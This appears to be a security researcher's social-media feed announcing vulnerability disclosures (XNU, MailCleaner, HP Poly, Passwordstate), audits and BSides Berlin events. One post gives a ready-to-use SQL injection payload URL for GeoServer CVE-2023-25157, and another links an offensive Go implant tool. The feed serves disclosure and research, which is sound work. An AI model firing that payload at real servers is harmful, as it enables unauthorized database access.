Vincent Ulitzsch

CVE-2025-24118 is an absolutely crazy race condition I found in the macOS / XNU kernel. Safe memory reclamation, read-only objects, memcpy implementation details, and a race condition- oh my! jprx.io/cve-2025-24118

During a #redteam at @mod0 we discovered a limited but neat bypass for #printnightmare. I talked to @itm4n about it and he had an indepth look. Read about it here: itm4n.github.io/printnightmare… #itsec

A big thank you to our Review Committee @BalthasarMartin @parzel2 @vinulium, Luca Melette and Diana Janetzky. We now have an amazing schedule featuring their favourite talks which you can check out here: bsides.berlin #BSidesBerlin #appsec #infosec #BSides

You think Rust is great but you can't use it for your embedded device? Ivan and me wrote a blog post about gradually introducing it into existing C firmware 🦀🦀🦀 security.googleblog.com/2024/09/deploy…

Shells at midnight: Exploiting the flexibility of Email addresses for offensive purposes. Today we are publishing a new blog post about our disclosure report on #MailCleaner #CVE-2024-3191: modzero.com/en/blog/beyond… @born0monday@chaos.social will also present at @a41con today.

We identified critical vulnerabilities in MailCleaner. A command injection vulnerability can be exploited by sending an Email. Our report can be found here: modzero.com/en/advisories/… Kudos to @born0monday" target="_blank" rel="nofollow noopener">chaos.social/@born0monday and @parzel" target="_blank" rel="nofollow noopener">chaos.social/@parzel #MailCleaner #CVE-2024-3191 #Infosec

Unfortunately this is necessary: 8532a9e0e49991ffdc3bfe7b728513e254e288a86275c6473e3b42228641e5fa MZ-24-01_8641e5fa.pdf (and please find us on mastodon as well: @modzero" target="_blank" rel="nofollow noopener">infosec.exchange/@modzero)

Today we release the proof-of-concept exploits for the vulnerabilities we identified in HP #Poly VoIP devices. At the #37C3 we presented how these issues allow an attacker with network access to gain RCE and transform your devices into wiretaps. github.com/modzero/MZ-23-…

Proof of Concept for #CVE-2023-25157 /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=osm:osm_places&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+current_user%29+AS+INTEGER%29%29+--+%27%29+%3D+true

The world's first(?) kernel exploit for Vision Pro- on launch day!

I merged together a few offensive golang projects to create a go / cgo bof runner that you can use in your implants. Not field-tested though :) #redteam github.com/parzel/GoBofRu…

A big thank you to our Review Committee @BalthasarMartin @parzel2 @vinulium and Luca Melette. We now have an amazing schedule featuring their favourite talks which you can check out on bsides.berlin #BSidesBerlin #appsec #infosec #BSides

Disk encryption is critical in securing your data when you lose your device or an attacker gets physical access. But we found that if you don't use a BitLocker passphrase on an AMD system (before Windows even comes up), your data is not adequately secured: arxiv.org/abs/2304.14717

Our early xmas present: We prove a super-polynomial #quantumadvantage of fault tolerant #quantumcomputers for combinatorial #optimization. scirate.com/arxiv/2212.086…

@parzel2 Showing cracks in the very foundation of some institutions' security: The results of his security assessment of Passwordstate are extremely impressive and alarming.

Better make sure your password manager is secure -- or someone else will. We found critical security issues in the enterprise password manager Passwordstate that allowed to access passwords and gain a shell -- without any authentication #CVE-2022-3875 modzero.com/modlog/archive…

#BSidesBerlin is back! Save the date: Saturday 26.11 at @cbase and online The CFP is Open until 16.10 papercall.io/bsides-2022-be… Tickets are available on our website bsides.berlin @SecurityBSides @cfp_time

After 2 years of audits, here are our top 6 bug classes we find when auditing #Substrate-based Blockchains. Read how to find them as well on srlabs.de/bites/blockcha…

In over a dozen audits we gained extensive experience in auditing #Substrate-based blockchain projects. This blog post describes our methodology that helped to identify many critical vulnerabilities. srlabs.de/bites/blockcha…

We're thrilled to announce @LiveOverflow as opening keynote speaker for this year’s #BSidesBerlin If you want to join the lineup, our CFP is open until 06.05! papercall.io/bsides-2021-be…